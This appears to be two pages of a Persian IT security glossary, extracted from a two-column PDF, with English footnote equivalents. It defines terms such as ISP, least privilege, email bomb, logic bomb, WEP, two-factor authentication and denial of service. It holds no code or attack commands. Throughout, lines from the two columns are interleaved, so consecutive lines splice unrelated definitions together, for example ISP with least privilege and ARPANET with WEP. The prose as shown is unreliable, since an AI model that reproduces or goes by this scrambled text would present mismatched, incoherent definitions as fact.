‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‪ .‬ﻧﻮﻋﹰﺎ ‪ISP‬ﻫﺎ ﻋـﻼﻭﻩ ﺑـﺮ ﻓـﺮﺍﻫﻢ ﻛـﺮﺩﻥ‬
‫ﻛﺎﺭ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻃﺮﺍﺣﻲ‪ ،‬ﺳﻄﺢ ﺍﻋﺘﺒﺎﺭ ﺗﺼﺪﻳﻖﺷـﺪﻩ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺧﺪﻣﺎﺕ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻋﻤﻠﻜﺮﺩ‬
‫ﺭﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ‪ .‬ﺑﺮﺧﻲ ‪ISP‬ﻫﺎ ﻫﻤﭽﻨـﻴﻦ ﺧـﺪﻣﺎﺕ ﺫﺧﻴـﺮﺓ‬
‫ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﺎ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻ ﻣﻨﺠﺮ ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ‬
‫ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺍﺩﺍﺭﻩ ﻭ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺭﺧﻨﺔ ﺍﻣﻨﻴﺘﻲ ﺷﻮﺩ ﺭﺍ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻭﺭﺩ‪.‬‬
‫‪٣٦٦‬‬
‫‪٣٧٣‬‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺣﺎﻟﺖ‬
‫ﺍﻣﻀﺎﻱ ﻣﻌﺘﺒﺮ‬
‫ﺭﻭﺷــﻲ ﺑــﺎ ﺁﻣﻴــﺰﻩﺍﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬــﺎﻱ ‪ proxy‬ﻭ ﻏﺮﺑــﺎﻝﺳــﺎﺯﻱ‬
‫ﻳﻚ ﺍﻣﻀﺎ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ،‬ﻛﻪ ﭼﻮﻥ ﻣﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﺘﻨﺎﻭﺏ‪ ،‬ﺑﺴﺘﻪ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﻭ ﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭ ﻛﺎﺭ‪.‬‬
‫ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻥ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫‪367 Trojan Horses‬‬


‫‪368 Data Encryption Standard‬‬ ‫‪362 Penetration Test‬‬
‫‪369 Wiretapping‬‬ ‫‪363 Vulnerability‬‬
‫‪370 Gateway‬‬ ‫‪364 Snooping Tool‬‬
‫‪371 Switch‬‬ ‫‪365 Internet Service Provider‬‬
‫‪372 Least Privilege‬‬ ‫‪366 Stateful Evaluation‬‬
‫‪373 Authentic Signature‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٥٦‬‬

‫‪٣٧٨‬‬
‫ﺑﻤﺐ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫ﺍﻃﻼﻋــﺎﺕ ﺩﺭ ﻣــﻮﺭﺩ ﺗﻌــﺎﺭﻳﻒ ﻭ ﺍﻟﺰﺍﻣــﺎﺕ ﻋﻤﻠﻜــﺮﺩ ﻭ ﻛــﺎﺭﺍﻳﻲ‬
‫ﺱ‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺍﮔﺮ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ‪ ،‬ﭘﻴﺎﻣﻬـﺎﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﻪ ﺁﺩﺭ ﹺ‬ ‫‪ 802.11‬ﺩﺭ ﺳﻨﺪ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺩﺍﺩﻩﺷﺪﻩ ﻣﻲﻓﺮﺳﺘﺪ ﺗﺎ ﺩﻳﺴﻚ ﺭﺍ ﭘﺮ ﻛﻨﺪ ﻭ ﻳـﺎ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪http://grouper.ieee.org/groups/802/11/Docu‬‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ‪.‬‬ ‫‪ments/DocumentArchives/1992-‬‬
‫‪docs/1192091.DOC‬‬
‫‪٣٧٩‬‬
‫ﭘﺮﺩﺍﺯﺵ ﺛﺒﺖ‬
‫‪٣٧٤‬‬
‫ﺭﻭﺍﻝ ﺧﻼﺻﻪﺳﺎﺯﻱ ﻭﻗﺎﻳﻊ ﺛﺒﺖﺷﺪﻩ‪ ،‬ﺑﺮﺭﺳﻲ ﺛﺒﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ‪،‬‬ ‫ﺍﻣﻨﻴﺖ ﺑﺮ ﭘﺎﻳﺔ ﻣﺤﻴﻂ‬
‫ﻭ ﻳﺎ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﻭﻗﺎﻳﻊ ﻛﻠﻴﺪﻱ‪.‬‬ ‫ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺑﺎ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﻤـﺎﻡ ﻧﻘـﺎﻁ‬
‫ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ‪.‬‬
‫‪٣٨٠‬‬
‫ﭘﺮﻭﺗﻜﻞ‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻣﻮﺭﺩ ﺗﻮﺍﻓﻖ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ‪.‬‬ ‫ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﻭ ﺩﺭ ﺍﺭﺗﺒـﺎﻁ ﻣﺘﻘﺎﺑـﻞ ﻛـﻪ‬
‫ﭘﺮﻭﺗﻜﻞ ﻣﻌﺎﺩﻝ ﺑﻲﺳﻴﻢ )‪(WEP‬‬ ‫ﺗﻮﺳﻂ ﻧﻬﺎﺩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﺠﺎﺭﻱ ﻭ ﺩﻭﻟﺘﻲ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ‪ WLAN‬ﻃﺮﺍﺣﻲ‬ ‫ﺭﻳــﺸﻪﻫــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ ﺍﻭﺍﻳــﻞ ﺳــﺎﻝ ‪ - ۱۹۶۹‬ﻫﻨﮕﺎﻣﻴﻜــﻪ‬
‫ﺷﺪﻩ ﺑﻮﺩ ﺗﺎ ﺷﺪﻩ ﺑﻮﺩ ﺗﺎ ﺧﺼﻮﺻﻴﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ‬ ‫‪ ARPANET‬ﺷﻜﻞ ﮔﺮﻓﺖ ‪ -‬ﺑﻮﺟﻮﺩ ﺁﻣـﺪ‪ ARPA .‬ﻋﻼﻣـﺖ‬
‫ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ )ﻭﻳﮋﮔﻴﻬﺎﻳﻲ ﭼﻮﻥ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ‬ ‫ﺍﺧﺘﺼﺎﺭﻱ ﺳﺎﺯﻣﺎﻥ ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﭘﻴﺸﺮﻓﺘﻪ‪ ٣٧٥‬ﺍﺳـﺖ ﻛـﻪ‬
‫ﺩﺍﺩﻩﻫﺎ(‪ ،‬ﻭﻟﻲ ﺑﻪ ﺩﻟﻴﻞ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﻳـﻚ ﻧﻘـﺺ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺁﻥ‪،‬‬ ‫ﺑﺨﺸﻲ ﺍﺯ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺤﺴﻮﺏ ﻣﻲﺷﺪ‪ .‬ﻳﻜﻲ ﺍﺯ‬
‫ﻻ ﺑﺎ ﺗﺪﺍﺑﻴﺮ ﻭﻳﮋﺓ ﺩﻳﮕﺮﻱ ﻫﻤﺮﺍﻩ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﻣﻌﻤﻮ ﹰ‬ ‫ﺍﻫﺪﺍﻑ ‪ ARPANET‬ﺗﺤﻘﻴﻖ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻮﺯﻳﻊﺷﺪﺓ‬
‫ﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺍﻫﺪﺍﻑ ﻧﻈﺎﻣﻲ ﺑﻮﺩ‪ .‬ﺍﻭﻟـﻴﻦ ﭘﻴﻜﺮﺑﻨـﺪ ﹺ‬
‫‪٣٨١‬‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫ﺁﻥ ﻣﺘﺸﻜﻞ ﺍﺯ ‪ ۴‬ﺭﺍﻳﺎﻧﻪ ﺑﻮﺩ ﻭ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻪ ﻃﺮﺍﺣﻲ ﺩﺭ ﺁﻣﺪﻩ‬
‫ﻣﻌﺎﺩﻝ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺘﻲ؛ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗﻮﺳـﻂ ﻫـﺮ‬ ‫ﺑﻮﺩ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭘﺮﺍﻛﻨـﺪﻩ ﺩﺭ‬
‫ﺷﺨﺼﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺍﺳـﺖ ﻓﺮﺳـﺘﺎﺩﻩ ﻭ ﻳـﺎ ﺩﺭﻳﺎﻓـﺖ‬ ‫ﻳﻚ ﻣﻨﻄﻘﺔ ﻭﺳﻴﻊ‪ ،‬ﺷﺒﻜﻪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪ .‬ﮔﺴﺘﺮﺵ ﺷﺒﻜﻪﻫﺎﻱ ﺑـﺎﺯ‬
‫ﺷﻮﺩ‪ .‬ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺗﻤﺎﻡ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘـﺸﻜﻞ‬ ‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ‪ ۱۹۸۰‬ﻧﻴﺎﺯﻣﻨﺪ ﻣﺪﻝ ﺟﺪﻳـﺪﻱ ﺍﺯ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺑـﻮﺩ‪.‬‬
‫ﺍﺯ ﻣﺘﻮﻥ ﭼﺎﭘﻲ‪ (ASCII) ٣٨٢‬ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﺍﺩﻏﺎﻡ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﻣﺨﺘﻠﻂ‪ ،‬ﺑـﻪ ﻳـﻚ‬
‫‪٣٨٣‬‬
‫ﻣﺒﺪﻝ ﺑﻬﺘﺮ ﻣﻴﺎﻥ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻏﻴـﺮ ﺍﻧﺤـﺼﺎﺭﻱ‬
‫ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ‬
‫ﺑﺮﺍﻱ ﺳﺎﺧﺖ ﺷﺒﻜﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺷﺖ‪ .‬ﭘﺮﻭﺗﻜـﻞ ‪) TCP/IP‬ﭘﺮﻭﺗﻜـﻞ‬
‫ﻇﺮﻓﻴﺖ ﻳﻚ ﺍﺗﺼﺎﻝ ﺩﺍﺩﻩﺍﻱ ﺷﺒﻜﻪ ﻛـﻪ ﻏﺎﻟﺒـﹰﺎ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻻﺕ‬ ‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ‪/‬ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧـﺖ(‪ ٣٧٦‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺩﺭ ﺁﻧﺰﻣﺎﻥ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎ ﻭﺍﺣﺪ ﻫﺰﺍﺭ ﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴـﻪ )‪ ٣٨٤(kbps‬ﺍﻧـﺪﺍﺯﻩﮔﻴـﺮﻱ‬ ‫ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩﺣﻞ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﺍﺩ‪.‬‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪٣٧٧‬‬
‫‪٣٨٥‬‬
‫ﺑﻤﺐ ﻣﻨﻄﻘﻲ‬
‫ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ‬
‫ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭﺍﺭﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﻲﺷـﻮﺩ‪ .‬ﺑﻤـﺐ‬
‫ﻓﺮﺁﻳﻨﺪ ﺍﺣﺮﺍﺯ ﻣﻴﺰﺍﻥ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﻳﻚ ﻛﺎﺭﺑﺮ‪،‬‬ ‫ﻣﻨﻄﻘﻲ ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺭﻭﻳﺎﺭﻭﻳﻲ ﺑﺎ ﻳﻚ ﺷﺮﺍﻳﻂ ﺍﺯﭘﻴﺶ ﺗﻌﺮﻳﻒﺷﺪﻩ‪،‬‬
‫ﭘﺮﺩﺍﺯﻩ ﻳﺎ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻃﺒﻖ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺷـﺮﻛﺖ‬ ‫ﻧﻬﻔﺘﻪ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ‪ ،‬ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻳﻚ ﻋﻤﻞ ﻏﻴﺮﻣﺠﺎﺯ ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﻻ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﭘﺲ ﺍﺯ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫ﻣﻲﺩﻫﺪ‪.‬‬

‫‪378 Email Bomb‬‬


‫‪379 Log Processing‬‬
‫‪380 Protocol‬‬
‫‪381 Email‬‬ ‫‪374 Perimeter-Based Security‬‬
‫‪382 Printable Text‬‬ ‫‪375 Advanced Research Projects Agency‬‬
‫‪383 Bandwidth‬‬ ‫‪376 Telecommunications Protocol / Internet Protocol‬‬
‫‪384 Kilo Bits Per Second‬‬ ‫‪377 Logic Bomb‬‬
‫‪385 Authorization‬‬
‫‪٤٥٧‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٣٩٢‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ‬ ‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﺎﺭﺑﺮ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻔـﻲ‬
‫ﻣﺒﻨﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ ﺁﻥ ﭼﻴـﺰﻱ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮ‬ ‫ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﻋﻄﺎ ﻛﺮﺩ‪.‬‬
‫ﻣﻲﺩﺍﻧﺪ )ﻋﺎﻣﻞ ﺍﻭﻝ( ﺑﻌﻼﻭﺓ ﭼﻴﺰﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺁﻧـﺮﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ‬
‫‪٣٨٦‬‬
‫)ﻋﺎﻣﻞ ﺩﻭﻡ(‪ .‬ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ‪ ،‬ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﻫـﺮ ﺩﻭ‬ ‫ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺩﺳﺘﺮﺳﻲ‬
‫ﻋﺎﻣﻞ ﺭﺍ ﺑﺮ ﺁﻭﺭﺩ‪ ،‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ‬ ‫ﻣﺠﻮﺯ ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﻃﻲ ﺁﻥ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺍﻳـﺴﺘﮕﺎﻩﻫـﺎﻱ‬
‫ﺧﻮﺩﭘﺮﺩﺍﺯ ﺑﺎﻳﺪ ﻛـﺎﺭﺕ ﻣﺨـﺼﻮﺹ ﺁﻧـﺮﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻭ ﺷـﻤﺎﺭﺓ‬ ‫ﻛﺎﺭﻱ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻭ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ )‪ (PIN‬ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻭﺍﺭﺩ ﻛﻨﺪ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ‬ ‫‪٣٨٧‬‬
‫ﺗﺎﺑﻠﻮﻱ ﺍﻋﻼﻧﺎﺕ‬
‫ﺍﻳﻨﻜﻪ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﭘﺮﺳﺶ ﻭ ﭘﺎﺳﺦ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺷـﻮﻧﺪ‪،‬‬
‫ﻳﻚ ﻣﺤﻴﻂ ﺑﺮﺍﻱ ﺗﻌﺎﻣـﻞ ﺩﺍﻧـﺶ ﻛـﻪ ﺩﺭ ﺁﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻗﺎﺩﺭﻧﺪ ﭘﻴﺎﻡ ﺑﻨﻮﻳـﺴﻨﺪ‪ ،‬ﭘﻴﺎﻣﻬـﺎﻱ ﺳـﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺨﻮﺍﻧﻨـﺪ‪ ،‬ﻭ‬
‫‪٣٩٣‬‬
‫ﺗﺼﻮﻳﺮ ﺁﻧﻲ‬ ‫ﺗﺒﺎﺩﻝ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪.‬‬
‫ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻣﻘﺎﺩﻳﺮ ﻣﺨﺘﻠﻒ ﺣﺎﻓﻈﺔ ﻳﻚ ﺭﺍﻳﺎﻧﻪ )ﺣﺎﻓﻈـﺔ ﺍﺻـﻠﻲ‪،‬‬ ‫‪٣٨٨‬‬
‫ﺗﺤﻠﻴﻞ ﻣﺨﺎﻃﺮﻩ‬
‫ﺛﺒ‪‬ﺎﺗﻬﺎﻱ ﺧﺎﺹ‪ ،‬ﻭ ‪ (...‬ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﻣﺸﺨﺺ‪ .‬ﺗﺼﻮﻳﺮ ﺁﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻮﺟﻮﺩ‪ ،‬ﻭ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ‬
‫ﻻ ﻗﺒـﻞ ﺍﺯ ﺗﻜﻤﻴـﻞ ﺣﻤﻠـﻪ ﺗﻮﺳـﻂ‬ ‫ﺑﺎ ﺿﺒﻂ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‪ .‬ﺗﺤﻠﻴـﻞ ﻣﺨـﺎﻃﺮﻩ ﻳـﻚ‬
‫ﻣﻬﺎﺟﻢ ﭘﺎﻙ ﻣﻲﺷﻮﺩ‪ ،‬ﺟﻬﺖ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺗﺨﻤــﻴﻦ ﺍﺯ ﺍﺭﺯﺵ ﻣــﺎﻟﻲ ﺁﺳــﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﺪﺳــﺖ ﻣــﻲﺩﻫــﺪ ﻭ‬
‫ﺗﻬﺎﺟﻢ‬ ‫‪٣٩٤‬‬ ‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺗﻼﺵ ﺑﺮﺍﻱ ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩﻥ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻢ ؛ ﺗـﻼﺵ ﻋﻤـﺪﻱ‬ ‫‪٣٨٩‬‬
‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‬
‫ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﺧﺪﻣﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻭ ﻧﻘﺾ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ‬
‫ﻧﻮﻋﻲ ﺣﻤﻠﻪ ﻛﻪ ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﭘﻴﺎﻣﻬﺎﻱ ﺑﻲﻣﺼﺮﻑ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﻤﺒﺎﺭﺍﻥ ﻣﻲﺷـﻮﻧﺪ‪،‬‬
‫‪٣٩٥‬‬
‫ﺗﻬﺪﻳﺪ‬ ‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﺗﻮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺻـﺮﻑ ﭘﺎﺳـﺦ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻫﺮ ﭼﻴﺰﻱ ﻛﻪ ﺗﻮﺍﻧﺎﻳﻲ ﺧﺪﺷﻪﺩﺍﺭ ﻛـﺮﺩﻥ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ‪،‬‬ ‫ﭘﻴﺎﻣﻬﺎ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺍﻗﻌﻲ ﻣﺠـﺎﻝ‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳﺦ ﭘﻴﺪﺍ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ‪.‬‬

‫‪٣٩٠‬‬
‫‪٣٩٦‬‬
